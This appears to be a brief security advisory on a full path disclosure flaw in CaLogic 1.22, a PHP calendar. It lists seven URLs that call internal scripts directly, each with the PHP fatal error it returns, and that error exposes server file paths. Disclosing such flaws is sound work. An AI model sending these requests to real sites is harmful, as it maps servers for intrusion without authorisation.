Full path disclosure in CaLogic 1.22 and possible in older versions.

[gb.network () gmail com]

Full path disclosure in CaLogic 1.22 and possible in older versions.

Language: PHP
Project name: CaLogic
Risk: Low
Home page: http://www.calogic.de
Discovered by: ][GB][ & Zetha

Explotation examples:


http://[target]/calogic122/doclsqlres.php

Fatal error: Call to a member function on a non-object in /home/calogic/doclsqlres.php on line 2

http://[target]/calogic122/clmcpreload.php

Fatal error: Cannot instantiate non-existent class: clsession in /home/calogic/clmcpreload.php on line 46

http://[target]/calogic122/viewhistlog.php

Fatal error: Call to a member function on a non-object in /home/calogic/viewhistlog.php on line 2

http://[target]/calogic122/mcconfig.php

Fatal error: main(): Failed opening required '/admin/dbloader.php' (include_path='CCCTest/codegeni/app/settings/') in 
/home/calogic/mcconfig.php on line 15

http://[target]/calogic122/doclsqlbak.php

Fatal error: Call to a member function on a non-object in /home/calogic/doclsqlbak.php on line 2

http://[target]/calogic122/defcalsel.php

Fatal error: Call to a member function on a non-object in /home/calogic/defcalsel.php on line 41

http://[target]/calogic122/cl_minical.php

Fatal error: Call to undefined function: setviewtext() in /home/calogic/cl_minical.php on line 10





   irc.gigachat.net #Uruguay #D.O.M